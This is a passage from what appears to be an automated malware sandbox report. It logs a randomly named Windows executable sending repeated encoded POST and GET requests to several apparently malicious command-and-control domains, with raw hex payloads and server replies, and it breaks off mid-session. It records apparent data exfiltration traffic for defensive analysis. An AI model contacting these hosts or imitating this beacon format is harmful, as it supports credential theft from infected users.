                                                    Data Raw: 32 63 0d 0a e2 9e a1 ef b8 8f e5 bd 93 e5 89 8d e8 ae bf e9 97 ae e7 9a 84 e8 8a 82 e7 82 b9 ef bc 9a 32 31 36 2e 38 33 2e 33 33 2e 31 34 30 20 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 2c216.83.33.140 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    30192.168.2.455428216.83.33.140802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:33:13.474692106 CEST717OUTPOST /mpex/ HTTP/1.1
                                                    Host: www.a9jcpf.top
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.a9jcpf.top
                                                    Referer: http://www.a9jcpf.top/mpex/
                                                    Content-Length: 220
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 55 5a 58 50 55 62 61 38 4c 41 76 6f 66 61 45 77 45 50 35 4e 35 45 4b 74 75 36 64 30 7a 48 46 77 47 42 6a 36 58 72 36 62 6b 73 69 31 73 34 73 78 64 79 37 55 34 2b 6f 38 70 36 41 75 34 58 39 69 75 6e 48 69 31 58 39 76 57 76 54 62 43 63 7a 74 43 61 54 31 50 6a 31 79 48 47 39 52 58 36 53 32 57 68 76 69 6b 63 58 53 4f 58 72 56 61 63 63 59 33 65 49 2b 42 61 6e 50 52 33 49 47 53 2f 45 6f 6b 41 65 59 6e 56 31 48 30 42 54 57 75 4c 4f 4f 50 64 42 31 4a 62 64 6b 6a 41 7a 77 66 33 7a 2b 37 65 69 53 51 51 48 51 71 34 58 39 63 4d 35 59 37 2f 46 69 36 53 49 70 63 4f 5a 44 34 56 31 2f 78 56 55 59 62 4a 68 37 61 6a 32 4d 32 46 74 71 61 4e 47 6a 33 4d 77 3d
                                                    Data Ascii: efM=UZXPUba8LAvofaEwEP5N5EKtu6d0zHFwGBj6Xr6bksi1s4sxdy7U4+o8p6Au4X9iunHi1X9vWvTbCcztCaT1Pj1yHG9RX6S2WhvikcXSOXrVaccY3eI+BanPR3IGS/EokAeYnV1H0BTWuLOOPdB1JbdkjAzwf3z+7eiSQQHQq4X9cM5Y7/Fi6SIpcOZD4V1/xVUYbJh7aj2M2FtqaNGj3Mw=
                                                    Aug 5, 2024 15:33:14.393913031 CEST208INHTTP/1.1 530
                                                    Date: Mon, 05 Aug 2024 13:33:14 GMT
                                                    Content-Type: text/html;charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Server: cdn
                                                    Data Raw: 32 63 0d 0a e2 9e a1 ef b8 8f e5 bd 93 e5 89 8d e8 ae bf e9 97 ae e7 9a 84 e8 8a 82 e7 82 b9 ef bc 9a 32 31 36 2e 38 33 2e 33 33 2e 31 34 30 20 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 2c216.83.33.140 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    31192.168.2.455429216.83.33.140802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:33:16.004317999 CEST10799OUTPOST /mpex/ HTTP/1.1
                                                    Host: www.a9jcpf.top
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.a9jcpf.top
                                                    Referer: http://www.a9jcpf.top/mpex/
                                                    Content-Length: 10300
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 55 5a 58 50 55 62 61 38 4c 41 76 6f 66 61 45 77 45 50 35 4e 35 45 4b 74 75 36 64 30 7a 48 46 77 47 42 6a 36 58 72 36 62 6b 73 71 31 73 75 34 78 66 52 44 55 37 2b 6f 38 71 36 41 76 34 58 38 34 75 6e 66 6d 31 57 41 61 57 70 58 62 43 35 2f 74 44 75 6e 31 56 7a 31 79 49 6d 39 55 61 61 53 5a 57 68 2f 75 6b 66 2f 53 4f 58 72 56 61 65 45 59 2b 71 63 2b 44 61 6e 41 5a 58 49 4b 57 2f 45 41 6b 42 32 75 6e 56 68 39 30 53 4c 57 70 72 65 4f 4d 76 70 31 47 62 64 69 7a 51 79 6c 66 33 2b 75 37 64 47 76 51 51 7a 2b 71 2f 6e 39 65 4e 59 47 2f 39 45 2f 6e 41 67 57 44 4e 73 67 2f 33 4a 59 71 57 4e 39 4b 71 73 67 4f 33 36 46 38 31 38 50 4e 75 66 69 6c 71 59 2f 41 61 67 6a 78 49 33 30 74 31 78 6c 53 79 6e 57 58 54 76 79 45 35 7a 75 35 55 78 47 6f 4f 52 64 71 53 75 76 76 7a 70 61 55 4f 39 5a 6d 31 59 56 30 57 57 64 59 59 4c 78 4b 42 6b 43 6c 73 43 4f 73 55 75 2f 2b 44 4b 74 58 30 52 47 42 55 51 55 43 38 58 69 52 32 42 50 48 67 4f 71 6d 4c 4c 77 6d 4b 33 5a 49 63 50 4c 49 67 5a 75 62 38 54 39 58 38 74 39 50 58 [TRUNCATED]
                                                    Data Ascii: efM=UZXPUba8LAvofaEwEP5N5EKtu6d0zHFwGBj6Xr6bksq1su4xfRDU7+o8q6Av4X84unfm1WAaWpXbC5/tDun1Vz1yIm9UaaSZWh/ukf/SOXrVaeEY+qc+DanAZXIKW/EAkB2unVh90SLWpreOMvp1GbdizQylf3+u7dGvQQz+q/n9eNYG/9E/nAgWDNsg/3JYqWN9KqsgO36F818PNufilqY/AagjxI30t1xlSynWXTvyE5zu5UxGoORdqSuvvzpaUO9Zm1YV0WWdYYLxKBkClsCOsUu/+DKtX0RGBUQUC8XiR2BPHgOqmLLwmK3ZIcPLIgZub8T9X8t9PXJrR2S3/7Jdt0Jc/G58kqusbbkS3pesXk5JwRSi4/mTpHF226MXLwTTRufKqbOPA+ACMtpJZI4T54WOPiT+oNAKaT9FFCmXJlUR7SkmMRMCuC8wmAxe7WdY1F2HX//0gBwGSNNLjJGiHHlyHuIYfAcA+PpXX3ELLVSqTd26G8oZhnSwzR6QVyONqhw7/rvMYfVxMSMZh59yy4DLWytoRIF/lZeZ+OiH3quG2KCkBbHZ209PItyZh1CIqDdHHvzEiuQ8/xuBGsWh5Zp/n55tO/ykT6wgKMVATlR4ycFHpyHgwHfIweuW3d8WekNQE3TXcz/WhpKtd5ghIo00ecHTo+3xDYsdCc5NRUixYZz1GbOYRF1oYWLd0lrgTQYunafk4MCnwCNVIo33+MBV7WyEergnNzHP/e8kgoaE36ItanH568Wu9BOv0JJDf8IDtZ0b8fiHlaOsnkx5HMjEWggPNlbgaslb0opOpKb88q6ma0Uv2pybEMpgxVhtvAKUB2YBcTq4dqyPFZQwgWTw0k4ZjUginnzaTT5EIFpy90jPcvfl6RDgrSri3pYa8shQfo5h4U19UgsmuTqLjJ6GVyN/xL/UFEdELw4JczFdNgzc1NhCoxIPkqCNR2zkwCnLu8Gl61iyCbwzQjH/92GFV74XQRuWC5GwEPQ+cERl [TRUNCATED]
                                                    Aug 5, 2024 15:33:16.886800051 CEST208INHTTP/1.1 530
                                                    Date: Mon, 05 Aug 2024 13:33:16 GMT
                                                    Content-Type: text/html;charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Server: cdn
                                                    Data Raw: 32 63 0d 0a e2 9e a1 ef b8 8f e5 bd 93 e5 89 8d e8 ae bf e9 97 ae e7 9a 84 e8 8a 82 e7 82 b9 ef bc 9a 32 31 36 2e 38 33 2e 33 33 2e 31 34 30 20 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 2c216.83.33.140 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    32192.168.2.455430216.83.33.140802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:33:18.534984112 CEST435OUTGET /mpex/?GTP=uhqpjxIPh&efM=Zb/vXsPYNAfjWKU5b+Nt30TyxsxOl11zNhfSVr6onri574wTGgCf5cxGoeAVsjx/n1bbhUl7cIXTAf7wH/T3DCw+G1Vpb7KEKzC8l577KkftecMR999sDYI= HTTP/1.1
                                                    Host: www.a9jcpf.top
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Aug 5, 2024 15:33:19.469336033 CEST208INHTTP/1.1 530
                                                    Date: Mon, 05 Aug 2024 13:33:19 GMT
                                                    Content-Type: text/html;charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Server: cdn
                                                    Data Raw: 32 63 0d 0a e2 9e a1 ef b8 8f e5 bd 93 e5 89 8d e8 ae bf e9 97 ae e7 9a 84 e8 8a 82 e7 82 b9 ef bc 9a 32 31 36 2e 38 33 2e 33 33 2e 31 34 30 20 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 2c216.83.33.140 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    33192.168.2.45543135.241.42.217802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:33:25.219007015 CEST703OUTPOST /zjwj/ HTTP/1.1
                                                    Host: www.tqfabxah.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.tqfabxah.com
                                                    Referer: http://www.tqfabxah.com/zjwj/
                                                    Content-Length: 200
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 71 46 6a 69 61 54 4a 50 45 58 63 55 66 67 66 31 30 47 6c 7a 41 6c 6a 74 4e 4f 66 2f 75 67 6a 75 64 34 6b 58 74 44 4d 78 6c 53 61 50 78 47 48 49 58 38 61 55 68 64 31 74 35 6a 6d 4b 56 65 4f 38 35 62 76 58 77 49 59 74 6e 44 4f 65 48 61 6b 71 4e 72 33 39 47 51 66 76 47 53 38 51 37 69 74 51 6f 46 32 4a 6a 48 47 6b 48 68 36 67 68 71 69 33 39 69 37 49 63 52 42 49 4b 79 6d 63 6c 4c 2b 4e 4e 6c 6c 48 74 70 38 41 36 7a 6a 4f 6e 50 5a 74 4d 63 6f 55 58 4a 50 6f 43 34 43 39 4a 44 34 62 77 58 78 5a 4a 6e 77 34 4e 59 68 57 76 6a 2b 4d 55 33 4e 35 30 57 47 4a 58 65 68 57 44 38 6e 50 4c 67 3d 3d
                                                    Data Ascii: efM=qFjiaTJPEXcUfgf10GlzAljtNOf/ugjud4kXtDMxlSaPxGHIX8aUhd1t5jmKVeO85bvXwIYtnDOeHakqNr39GQfvGS8Q7itQoF2JjHGkHh6ghqi39i7IcRBIKymclL+NNllHtp8A6zjOnPZtMcoUXJPoC4C9JD4bwXxZJnw4NYhWvj+MU3N50WGJXehWD8nPLg==
                                                    Aug 5, 2024 15:33:25.855170012 CEST735INHTTP/1.1 405 Method Not Allowed
                                                    Server: nginx/1.20.2
                                                    Date: Mon, 05 Aug 2024 13:33:25 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 559
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e [TRUNCATED]
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    34192.168.2.45543235.241.42.217802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:33:27.752913952 CEST723OUTPOST /zjwj/ HTTP/1.1
                                                    Host: www.tqfabxah.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.tqfabxah.com
                                                    Referer: http://www.tqfabxah.com/zjwj/
                                                    Content-Length: 220
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 71 46 6a 69 61 54 4a 50 45 58 63 55 65 41 76 31 78 6c 4e 7a 42 46 6a 75 43 75 66 2f 6b 41 6a 79 64 34 59 58 74 43 35 30 77 77 2b 50 79 6a 72 49 59 59 75 55 69 64 31 74 68 54 6d 44 61 2b 4f 4e 35 62 7a 31 77 4a 6b 74 6e 41 79 65 48 59 73 71 4e 59 76 38 48 41 66 70 41 53 39 57 6a 43 74 51 6f 46 32 4a 6a 47 6a 44 48 68 69 67 68 61 79 33 39 48 62 48 56 78 42 4c 4e 79 6d 63 79 62 2b 4a 4e 6c 6b 69 74 74 63 71 36 78 72 4f 6e 4f 4a 74 4c 4e 70 43 5a 4a 50 79 63 34 43 72 59 43 59 65 30 46 56 55 49 6b 6f 37 49 4a 6c 39 6e 46 76 57 46 47 73 75 6d 57 69 36 4b 5a 6f 69 4f 2f 61 47 51 67 4d 43 46 4d 64 6b 33 61 45 65 53 79 31 78 35 4d 56 75 7a 56 73 3d
                                                    Data Ascii: efM=qFjiaTJPEXcUeAv1xlNzBFjuCuf/kAjyd4YXtC50ww+PyjrIYYuUid1thTmDa+ON5bz1wJktnAyeHYsqNYv8HAfpAS9WjCtQoF2JjGjDHhighay39HbHVxBLNymcyb+JNlkittcq6xrOnOJtLNpCZJPyc4CrYCYe0FVUIko7IJl9nFvWFGsumWi6KZoiO/aGQgMCFMdk3aEeSy1x5MVuzVs=
                                                    Aug 5, 2024 15:33:28.385828972 CEST176INHTTP/1.1 405 Method Not Allowed
                                                    Server: nginx/1.20.2
                                                    Date: Mon, 05 Aug 2024 13:33:28 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 559
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Aug 5, 2024 15:33:28.389327049 CEST559INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to d


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    35192.168.2.45543335.241.42.217802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:33:30.286026955 CEST10805OUTPOST /zjwj/ HTTP/1.1
                                                    Host: www.tqfabxah.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.tqfabxah.com
                                                    Referer: http://www.tqfabxah.com/zjwj/
                                                    Content-Length: 10300
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 71 46 6a 69 61 54 4a 50 45 58 63 55 65 41 76 31 78 6c 4e 7a 42 46 6a 75 43 75 66 2f 6b 41 6a 79 64 34 59 58 74 43 35 30 77 77 32 50 78 52 6a 49 58 66 79 55 6a 64 31 74 2f 6a 6d 4f 61 2b 4f 55 35 62 37 78 77 4a 6f 39 6e 47 32 65 42 39 67 71 63 64 62 38 49 41 66 70 4e 79 39 47 37 69 74 46 6f 45 47 4e 6a 48 54 44 48 68 69 67 68 63 2b 33 36 53 37 48 5a 52 42 49 4b 79 6d 59 6c 4c 2b 78 4e 68 41 55 74 73 63 51 35 42 4c 4f 6e 76 35 74 4f 37 31 43 52 4a 50 73 49 59 44 6f 59 43 56 4f 30 46 49 6c 49 6e 31 65 49 4a 52 39 6a 7a 61 38 56 6d 63 43 35 30 4f 6c 64 4f 45 64 41 34 69 37 4c 7a 5a 2f 4e 66 56 6d 6b 35 45 42 64 78 34 6c 6f 39 4e 4c 6d 54 65 54 32 77 41 66 75 39 49 79 76 7a 35 79 76 78 36 6a 4a 43 72 53 61 35 76 4f 63 58 44 54 6c 57 50 77 57 67 72 70 5a 51 30 37 49 78 47 30 4e 54 5a 6e 34 5a 72 44 2b 74 64 41 56 6d 58 69 5a 31 6b 4a 63 56 43 67 4f 4e 77 44 57 35 63 6a 4e 44 53 59 57 4c 73 41 30 72 68 45 41 69 51 6e 75 35 58 33 2b 77 4f 4e 4f 72 38 58 2b 32 46 34 56 52 2b 58 49 2f 58 35 6b 67 [TRUNCATED]
                                                    Data Ascii: efM=qFjiaTJPEXcUeAv1xlNzBFjuCuf/kAjyd4YXtC50ww2PxRjIXfyUjd1t/jmOa+OU5b7xwJo9nG2eB9gqcdb8IAfpNy9G7itFoEGNjHTDHhighc+36S7HZRBIKymYlL+xNhAUtscQ5BLOnv5tO71CRJPsIYDoYCVO0FIlIn1eIJR9jza8VmcC50OldOEdA4i7LzZ/NfVmk5EBdx4lo9NLmTeT2wAfu9Iyvz5yvx6jJCrSa5vOcXDTlWPwWgrpZQ07IxG0NTZn4ZrD+tdAVmXiZ1kJcVCgONwDW5cjNDSYWLsA0rhEAiQnu5X3+wONOr8X+2F4VR+XI/X5kgsACRzh6Uhkz1qejiUii5PlpDTaCFHvOKEnAJXDnDc8BAYWxWAWVx1GM3Qux53kwqV3HTwEAh83MtWJkfw/mzQ1KMut5EuZN2U0WEieRCWOEZ6YgY/NcLBqPaNJkaPMmZLAVNzmDfeKnO06V4uFGEimdBAp19ue1u9+eQpOcQzbtcVfryZ6jX6DZOj5XUOVN0nj9sHPVLcPPp11WMpbpuUzv0qtKtTOljnz7Qd47QX0nSzphz4KUxOU3ab7I5P8+vzmALYIXn8kcAZesuZxaN33qo06bdubsMN53tsX6UA9QOWCR6SOQXU3cE1gQksw9OnHjkpdcYzxi22Q+0yKK5Q/l1u7rEMJqpCFTpFSzBuDr3q/hZO80iB8HxoD+jV7mE/1Tl0rYput3LPVOpBizWvpL7WmIRsCc/dBK5PIkzexX7rKpBxoD05de61fTcxD8FypzOLfZ+f/TIUwOxSeE4IRyyUzUmkDCnYNYvEzN/5vmbfU5NuMn1ubP/9xyuIjF4A9uK6rDpRqHVMZ0j8Cg8oEVJlOcRBL6qEIG1782al2QGWOAhj18sBomgmR4Zzhq/fN6YEsvAMqgOhjGItZ5F/SOEjhY0ZQM+TmdO60naBj6CtziSds9lJVc6Gs9f4bjqKAT5a8MBgAtcce5F9n8XQLu7iVYGpe7h7P [TRUNCATED]
                                                    Aug 5, 2024 15:33:30.938205957 CEST176INHTTP/1.1 405 Method Not Allowed
                                                    Server: nginx/1.20.2
                                                    Date: Mon, 05 Aug 2024 13:33:30 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 559
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Aug 5, 2024 15:33:30.939831972 CEST559INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to d


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    36192.168.2.45543435.241.42.217802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:33:32.819037914 CEST437OUTGET /zjwj/?efM=nHLCZn8vN2ArVDTtuX5SJ0P/P5D3rwrWV4l8hQoFqQuK0GTLFPexr5xj3EirNaSr0bv3za4OohaILLkKIoyZBj+QLQEglA9+lHyHnT+4OAarv/Cw0xbxNAM=&GTP=uhqpjxIPh HTTP/1.1
                                                    Host: www.tqfabxah.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Aug 5, 2024 15:33:33.467585087 CEST300INHTTP/1.1 200 OK
                                                    Server: nginx/1.20.2
                                                    Date: Mon, 05 Aug 2024 13:33:33 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 5161
                                                    Last-Modified: Mon, 15 Jan 2024 02:08:28 GMT
                                                    Vary: Accept-Encoding
                                                    ETag: "65a4939c-1429"
                                                    Cache-Control: no-cache
                                                    Accept-Ranges: bytes
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Aug 5, 2024 15:33:33.481019974 CEST1236INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63
                                                    Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true
                                                    Aug 5, 2024 15:33:33.481041908 CEST1236INData Raw: 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 6e 7d 66 75 6e 63 74 69 6f 6e 20 72 65 70 6f 72 74 4c 6f 61 64 69 6e 67 28 6e 29 7b 6e 3d 6e 7c 7c 7b 7d 3b 76 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 28 77 69 6e 64 6f
                                                    Data Ascii: w Image).src=n}function reportLoading(n){n=n||{};var o=function(){for(var n=(window.location.search.substr(1)||"").split("&"),o={},e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.
                                                    Aug 5, 2024 15:33:33.481056929 CEST1236INData Raw: 74 72 3d 64 73 66 72 70 66 76 65 64 6e 63 70 73 73 6e 74 6e 77 62 69 70 72 65 69 6d 65 75 74 73 76 22 29 3b 28 65 28 29 7c 7c 72 28 29 29 26 26 22 61 6e 64 72 6f 69 64 22 3d 3d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 77 69 6e 64 6f
                                                    Data Ascii: tr=dsfrpfvedncpssntnwbipreimeutsv");(e()||r())&&"android"===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)||n.match(/ipad/i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/ap
                                                    Aug 5, 2024 15:33:33.481072903 CEST1236INData Raw: 28 22 73 72 63 22 2c 22 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 2f 67 2f 30 31 2f 77 65 6c 66 61 72 65 61 67 65 6e 63 79 2f 76 63 6f 6e 73 6f 6c 65 2e 6d 69 6e 2d 33 2e 33 2e 30 2e 6a 73 22 29 2c 24 68 65 61 64 2e 69 6e 73 65 72
                                                    Data Ascii: ("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js"),$head.insertBefore($script1,$head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src
                                                    Aug 5, 2024 15:33:33.481098890 CEST217INData Raw: e6 b2 a1 e6 9c 89 e5 b9 bf e5 91 8a 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 94 b5 e5 bd b1 e6 92 ad e6 94 be e4 b8 8d e5 8d a1 e9 a1 bf 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 b2 be e5 bd a9 e8 a7 86 e9 a2 91 e5 ad 98 e5 85 a5 e7 bd 91 e7 9b 98 e9 9a 8f
                                                    Data Ascii: </div><div></div><div></div></div><script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js"></script></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    37192.168.2.45543576.223.67.189802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:33:38.524996042 CEST718OUTPOST /l2ei/ HTTP/1.1
                                                    Host: www.rtrpodcast.online
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.rtrpodcast.online
                                                    Referer: http://www.rtrpodcast.online/l2ei/
                                                    Content-Length: 200
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
